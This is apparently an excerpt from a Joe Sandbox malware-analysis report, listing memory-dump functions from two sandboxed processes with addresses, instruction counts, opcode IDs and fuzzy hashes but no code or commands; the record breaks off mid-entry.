Instruction Fuzzy Hash: 7181BF31B0DB4D4FDB58DE5C88615A97BE2EF98300F15027EE49EC32A6DE35AD028785

Function 00007FFD9B7F06C0 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00719c7e14237d4b66580dc775d4b9cddf154ee50ceac251d43893ab83a477fe
Instruction ID: 4887185d970dd664bfc8e33f3de686832265dfc84c408a4f54f8265f5d43816b
Opcode Fuzzy Hash: 00719c7e14237d4b66580dc775d4b9cddf154ee50ceac251d43893ab83a477fe
Instruction Fuzzy Hash: DD613953B0F7C94EEB215ABC68290B87F90EF9175070943F7D098861F7EC15AA1583E8

Function 00007FFD9B805420 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f925611850ed0d6e787e0d1099e210f0a4b5ecadbfb845d2fd23578745169dfa
Instruction ID: 91ae3d203edbe48f201953721196072014a8b9936c4748000f79a1256d272829
Opcode Fuzzy Hash: f925611850ed0d6e787e0d1099e210f0a4b5ecadbfb845d2fd23578745169dfa
Instruction Fuzzy Hash: CC613E70E0991D8FDBA4EFA8D8957EDBBF1FF58301F50016AD00DE72A2DA3569418B40

Function 00007FFD9B7F1CED Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adaa56664bd86dae2ceae2b46c1cd188680778ebd4b5eae443fe7d3ac7d87a30
Instruction ID: 2d73cf393dda38936c6f065e4979f8ea99e4e218b65bad8eb476ccec95ebfb7d
Opcode Fuzzy Hash: adaa56664bd86dae2ceae2b46c1cd188680778ebd4b5eae443fe7d3ac7d87a30
Instruction Fuzzy Hash: F051DF31B09B8A4FDB5CCE5888645BA77E2FF98301F15467ED45EC32A2CE34E9028781

Function 00007FFD9B7F31F5 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebe4f6202a82feb50658a92481b887b36fa86d481fce86114faaffc560f16bd6
Instruction ID: 4a16bbd4f9c5b3dffe8fc3fadc57499ff07f58da017850c306b409cecaa57da0
Opcode Fuzzy Hash: ebe4f6202a82feb50658a92481b887b36fa86d481fce86114faaffc560f16bd6
Instruction Fuzzy Hash: 82511C70E0961D8EEB64DB94C464AEDBBF1EF54304F520275D009E72A6DE38AA44CBA4

Function 00007FFD9B7F0805 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30afc24570b6abc75456c0421122bde457758bddb047e2f14016ec509d76c2c6
Instruction ID: fb6dee89a1bfed5725a343af1b9f6f5dc57539d425f45702a46275734a9abe44
Opcode Fuzzy Hash: 30afc24570b6abc75456c0421122bde457758bddb047e2f14016ec509d76c2c6
Instruction Fuzzy Hash: 37216B12F1E6CA97E7206BBC983A5E87F90EF51718B098277D0ACD50E3DD04A155C2C5

Function 00007FFD9B7F3400 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3427a974f5a96dd458bbe95176f213e60ebb85da499bfa10bebff56327d6c3dc
Instruction ID: cc3fbf5b019b8efb4f433fce85c558b3b16d32a1fb421fe19ddd6f397dcfcd20
Opcode Fuzzy Hash: 3427a974f5a96dd458bbe95176f213e60ebb85da499bfa10bebff56327d6c3dc
Instruction Fuzzy Hash: 3C217C30A4E78E8FDB53ABB488685A97FF0FF46310B0601E6D059CB0B2DA289549C761

Function 00007FFD9B7F32CA Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2003cb99dda1a112cab87a7f5dfbcc26bc9d30f2db35cafa904fad14460c125d
Instruction ID: 4a75122aaab3130507ae8afead5290700511e5d445fbdf510b55dd7a343562f8
Opcode Fuzzy Hash: 2003cb99dda1a112cab87a7f5dfbcc26bc9d30f2db35cafa904fad14460c125d
Instruction Fuzzy Hash: 9A21EA70E0961D8FEB64EB98C454AECBBF1FF58301F520279D009E72A5DE386A40CB54

Function 00007FFD9B7F2189 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca542287482af73f8834c9efa3ddd3809140d2b51b01cd8e8086556d037eb5a9
Instruction ID: b46cc021844d79eec833243c2f8dfeab30fce2c44c975d92a33d16e983b303dd
Opcode Fuzzy Hash: ca542287482af73f8834c9efa3ddd3809140d2b51b01cd8e8086556d037eb5a9
Instruction Fuzzy Hash: B511E430F1960E4FE715EBB488255A97BE0EF06300F4145F6E41DC70B6DE28B6458755

Function 00007FFD9B7F0A01 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05c21b8c3863fe03370757551089f5f95267d99fedf2084443a034797d39135
Instruction ID: 4b72edd962fad85097b17b8e6e7a1b3b8c7818b36093466b70d7ca14faa786d0
Opcode Fuzzy Hash: b05c21b8c3863fe03370757551089f5f95267d99fedf2084443a034797d39135
Instruction Fuzzy Hash: 8611BF30F1960E8EEB50EFA888585BD7BE0FF58700F8146B6D418C72B6EE34A6448750

Function 00007FFD9B7F1140 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46bbf1365b1f86ad5b4ad1ed50d4059d126337f34fa4fc4e450d18597164b9cf
Instruction ID: 241f675b1d43a8366a65c21022a2c7f1dab09024a13ed41b5d695a2ad086264c
Opcode Fuzzy Hash: 46bbf1365b1f86ad5b4ad1ed50d4059d126337f34fa4fc4e450d18597164b9cf
Instruction Fuzzy Hash: CE11E570F1960E8AEB68EBA8C4686BA7BE0FF59314F00067ED41AD25F1DE356650C740

Function 00007FFD9B7F3525 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e66bcfd53ec48db52b1e4fb14393687432839c9c92271ed8f5c0d1a2f88477
Instruction ID: c8a157b6a8df8d9ce546c5efc90eade18941700758c0d47c45852bb54becab2f
Opcode Fuzzy Hash: 80e66bcfd53ec48db52b1e4fb14393687432839c9c92271ed8f5c0d1a2f88477
Instruction Fuzzy Hash: 74118B70E5964E8FDB54EBA4C4686BE7BA0FF58304F4205BED41AC71A2DB34A640C750

Function 00007FFD9B7FAF28 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f8a118e43dad85ff7bdaf00ccbc3a1bdb03c25f0f3a7b9cc7b24b5f3da8374
Instruction ID: 0a0b09616a8454e62306745c3d3e47d1fd6abe5c2a2e246b2627c2273581da4e
Opcode Fuzzy Hash: 31f8a118e43dad85ff7bdaf00ccbc3a1bdb03c25f0f3a7b9cc7b24b5f3da8374
Instruction Fuzzy Hash: 34113C30E1590E8EDB94EF68C4586FE77A1FF58305F50047AD42AD21A4DB30A5508B50

Function 00007FFD9B7F2E61 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd6b882fca3e2dfd1a9eb2ef6514fb072580e4a9533ee9382d37069f5ea0b40
Instruction ID: 634359c5461461abce2b5a4766ae0e638364062b54d3915e76bcaaef3f47c84e
Opcode Fuzzy Hash: edd6b882fca3e2dfd1a9eb2ef6514fb072580e4a9533ee9382d37069f5ea0b40
Instruction Fuzzy Hash: 1101D430F5A64E8FE751EBA484585A93BE0EF19300F4205B6E408C71B2EA34E144C750

Function 00007FFD9B7F05D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aad59cb69b1fe1bf1e6ca0cc4afd0b82f2a9661ffeba6b27ae9fdfc063c92aa
Instruction ID: f09d9c0755fa4daea7b3bde843dd5d4c4840b1f8d8adfb54af6a5dddb445be2f
Opcode Fuzzy Hash: 8aad59cb69b1fe1bf1e6ca0cc4afd0b82f2a9661ffeba6b27ae9fdfc063c92aa
Instruction Fuzzy Hash: 86018030B0560E8EDB59EF64C4656B97BA1FF58304F51057AD40EC25E4CA32A650C784

Function 00007FFD9B7F283D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e52d378677c88598fd0b53a20da5d707e20db6e1066a6ccb19bb41168d2e70
Instruction ID: 015b6f9ec4bb30e9f6bdc9bbfaa8d1d3fb95b0ff8b17429a75e0e42da011c403
Opcode Fuzzy Hash: d9e52d378677c88598fd0b53a20da5d707e20db6e1066a6ccb19bb41168d2e70
Instruction Fuzzy Hash: 8F018430F5A64E8FD751ABB484585F97BE0EF19300F8245B6E418C70B6DE38E5548750

Function 00007FFD9B7F1C65 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b86df69151afc0d2309af39ca1cc77e05c1d93dde2b06fe7eaac365c236dbbf
Instruction ID: bb60a95aee65d39c575408b8113d62f830df44365246295b75f2c0c47da3290e
Opcode Fuzzy Hash: 4b86df69151afc0d2309af39ca1cc77e05c1d93dde2b06fe7eaac365c236dbbf
Instruction Fuzzy Hash: 5FF0FF30A4A74E8FDB95DF6488656BA7BA0FF55304F41017AE80CC35E1CB36AA60C780

Function 00007FFD9B7F2ED9 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce8291ff401dde220df003a55c72d67ea422bcb103d5dda2fc6725f04375ee5
Instruction ID: 3d9b9092ad1b5949c354c5149b3023d744d219af086ad158f76bc7ccb0f0586f
Opcode Fuzzy Hash: cce8291ff401dde220df003a55c72d67ea422bcb103d5dda2fc6725f04375ee5
Instruction Fuzzy Hash: B5017170A2A64E8FD752E7B488695A97BE0EF09300F4605B7E409CB0B6DA38A6448751

Function 00007FFD9B7F0608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90ae62822f3b4e0a34a0c5f244b6882ec14c9004e6422a48741f3c9b3b6bfe7
Instruction ID: bc722bebab5ec73078fe257c16494abdf72f36de76fe5a27b3847ee2bce1ad44
Opcode Fuzzy Hash: b90ae62822f3b4e0a34a0c5f244b6882ec14c9004e6422a48741f3c9b3b6bfe7
Instruction Fuzzy Hash: E901A230B1560E8AEF68EBA4C4685BD3AA0FF18304F90097EE41EC21F4DE35B140CA50

Function 00007FFD9B7F0610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac2fdc78fa13e8475c26c9209aa85251f1a39e496d76dde1b88aa050cc90f46
Instruction ID: 6e82b9e0447c8467a455d0389e69275c21ece37cbf905b47c8f48b4e3b8a8cf0
Opcode Fuzzy Hash: bac2fdc78fa13e8475c26c9209aa85251f1a39e496d76dde1b88aa050cc90f46
Instruction Fuzzy Hash: BF01A230B0560E8BDB68EBA4C4695B976E0FF08304F51097EE41ED21F4DE35A540C640

Function 00007FFD9B7F05D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ad3cebedbdd9e75bfc60da21be5da704ae9c161d359248a374d6ba62306d3d
Instruction ID: 914b5ad92e0c06ec44c612b70a1a77888051ea5a5fdf01ad56b737f6c8c0f657
Opcode Fuzzy Hash: 11ad3cebedbdd9e75bfc60da21be5da704ae9c161d359248a374d6ba62306d3d
Instruction Fuzzy Hash: 29F0AF30A0A64E8BEB65EE6494656BA3BA0EF45308F51057AE80DC25E1CA35A660C784

Function 00007FFD9B7F2759 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a07a3746aa50583741d9960b2e977d80fbcab3409722ea301ea967d74daccd
Instruction ID: 0c73dcdd9e451b98634011fbbf3ae300ce12530935ae33ab3685a4e0b62b1ea8
Opcode Fuzzy Hash: c4a07a3746aa50583741d9960b2e977d80fbcab3409722ea301ea967d74daccd
Instruction Fuzzy Hash: 39F06230A0E38D8FDB6A9F6488686B93F70BF06204F8605BAE419C61E2DB389554C751

Function 00007FFD9B7F27CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f47dc6c97793289977c292beb843481f3e812128a9f20751916d413f38ba5f1
Instruction ID: b084af2967c23aba640dfd2a20c2fa30f79f075899b4596dea811815b14b45c6
Opcode Fuzzy Hash: 5f47dc6c97793289977c292beb843481f3e812128a9f20751916d413f38ba5f1
Instruction Fuzzy Hash: 6EF09631A0E78E8FEB699FA488251B97FE0FF55304F8105BAE409C60F6DB399554C741

Function 00007FFD9B7F0F49 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1838131939.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9b7f0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8994809c96affee6c443c24aadaea0a7bcbfe4b678beb8a04aeec7fdac38c8d4
Instruction ID: 81054c0dd6a55f41d85e68f0a1539a4c5181a48126a56d5da3d6195d0c6ee76a
Opcode Fuzzy Hash: 8994809c96affee6c443c24aadaea0a7bcbfe4b678beb8a04aeec7fdac38c8d4
Instruction Fuzzy Hash: 1BF01D30B0950ECAEB24EB44C860BEE7BF1FB94301F2142B5C009A32A5DE746A858BC4

Analysis Process: RuntimeBroker.exePID: 7856, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B7E35A5 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad5b89d5f2829ff2e6ccceb7d8b1f1f0d39a9441c5dc74301bf68dce413f9de
Instruction ID: 1a1ed936f474d4c36123364dc689255bb5cd42d658dd0cbd46d8dd6b2f45ae75
Opcode Fuzzy Hash: bad5b89d5f2829ff2e6ccceb7d8b1f1f0d39a9441c5dc74301bf68dce413f9de
Instruction Fuzzy Hash: A8A1A271E19A4E8FEB95DB68C8657ED7BE1FF99310F4142BAD009D32E6DB7924018B00

Function 00007FFD9B7EC86D Relevance: 2.7, Strings: 2, Instructions: 212COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B7EC939
K|M, xrefs: 00007FFD9B7EC86F

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _$K|M
API String ID: 0-3210996399
Opcode ID: ca8f2f1907477cfea654d47efa7a7c3c762ab65da891a49cfa7f21c03a866785
Instruction ID: 8b11fca5c2a0e02799a65ee5a90816c14f70a4a05bbc3c46de9d183a46d0c800
Opcode Fuzzy Hash: ca8f2f1907477cfea654d47efa7a7c3c762ab65da891a49cfa7f21c03a866785
Instruction Fuzzy Hash: 90513B2FB0C26A49D714BB7CB8694ED3B60DF8133AB1A42F7D18DCA0E7DD18204686D4

Function 00007FFD9B7EC8FB Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B7EC939

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 2b8a99283f5b6bd1b55d928851e6cd7820a6e5aecc701b62358dc3a00aeefe88
Instruction ID: 54cf0f80db18cb622100c9ba5df77d38a05a07a3fd858a61b56344edb3236ca8
Opcode Fuzzy Hash: 2b8a99283f5b6bd1b55d928851e6cd7820a6e5aecc701b62358dc3a00aeefe88
Instruction Fuzzy Hash: 5741232BB0D66E89E714BB7CB8550ED37A0EF8033AF1502B7D509CA0E7EE24244687D0

Function 00007FFD9B7F00FB Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

G, xrefs: 00007FFD9B7F0119

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: c129ef198dedc0db23ceef2481cf838adafc14fc2b9642ed2932cdcd92ae3f07
Instruction ID: c1fe0f453f44426140a4e2d2706b44009237af0d8d64d29f2200d6566ea1abf3
Opcode Fuzzy Hash: c129ef198dedc0db23ceef2481cf838adafc14fc2b9642ed2932cdcd92ae3f07
Instruction Fuzzy Hash: F4D092B090861D8FEBA4EF08C8947AC76B1BF58304F0001AAD20ED22B0CB345BA08F09

Function 00007FFD9B7EDA29 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19994a66bace54fc63a673a38c1759989bbc3d8dc85993633e21a3a4f67b75b
Instruction ID: 2d75306f041116fe3f722b877b02dc83dbf727af888e7677ee70665faa210fba
Opcode Fuzzy Hash: b19994a66bace54fc63a673a38c1759989bbc3d8dc85993633e21a3a4f67b75b
Instruction Fuzzy Hash: 61E13E71E19A5D8FDB68DB58C8647A8B7B1FF58300F4541BAD01DD72E6DA346940CB40

Function 00007FFD9B7E1688 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809cfed13aad388661ac13c1fc7e21dac856f02e489b4aef29a15b683a323aab
Instruction ID: 0fe1c866a4d75a6156be39a835a78c10d9f2a84889e30ef66bf2df73b98f8ac5
Opcode Fuzzy Hash: 809cfed13aad388661ac13c1fc7e21dac856f02e489b4aef29a15b683a323aab
Instruction Fuzzy Hash: 8481CF31B0DB494FDB58DE5C88665A977E2EF98304B15027EE45EC32B2DE34AD028781

Function 00007FFD9B7F5420 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 378e2a46bd570bb80ddafccb43c2bea458fa6504ed08f06d450d11cf4eadd6ec
Instruction ID: 21fb01cd3c6105cee9c55a4648324b9ab8188a1f3812a0d01d8a3e97c4e6f053
Opcode Fuzzy Hash: 378e2a46bd570bb80ddafccb43c2bea458fa6504ed08f06d450d11cf4eadd6ec
Instruction Fuzzy Hash: D3615171E09A1D8FDFA4EBA8D4557ADBBF1FF58301F50016AD00DE72A2DA356981CB80

Function 00007FFD9B7E1CED Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb7c803a62f940e32d08db9f595c8c56caba723f7165efb1039878f4bc2b469
Instruction ID: 2ad453c9528685ac54c8a835a0f5544290eff681617a007d1da4b8550eed793a
Opcode Fuzzy Hash: 5eb7c803a62f940e32d08db9f595c8c56caba723f7165efb1039878f4bc2b469
Instruction Fuzzy Hash: 7651DE31B09B4A4FDB58CE5888655BA73E2FFD8301B15467EE45EC72A2CE34ED028781

Function 00007FFD9B7F2AD1 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f2000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f5ba81b63cbb40df6f1b9a719f985343966f257712b9909dcb20265f08370cf
Instruction ID: 6f89e62c3bf8a8f73bf7a7517c3563cc7778ef07828a8968c47c0df9d910bdd4
Opcode Fuzzy Hash: 3f5ba81b63cbb40df6f1b9a719f985343966f257712b9909dcb20265f08370cf
Instruction Fuzzy Hash: A0712A70E1965D8FDB64EFA4C8657ECBBB1FF18300F5142B9D419A72A1DE346A808B44

Function 00007FFD9B7E31F5 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca86c4c2d138f7ada362d733a49a35c0efa0aeb859bde14cb05661b1aa7dc64c
Instruction ID: 9b777aee50a8b17a7e5e8394281c7d4aba6853d0aeeea5c2d782a9910b4e40dc
Opcode Fuzzy Hash: ca86c4c2d138f7ada362d733a49a35c0efa0aeb859bde14cb05661b1aa7dc64c
Instruction Fuzzy Hash: 93513C70E0961D8FEB61DB94D464AEDB7F1EF58300F52427AD009E72B1DE386A44CB50

Function 00007FFD9B7EBDB9 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe57a1a205123d309dcc7462f5674b789b70a31fc75099618420e7ca5575d486
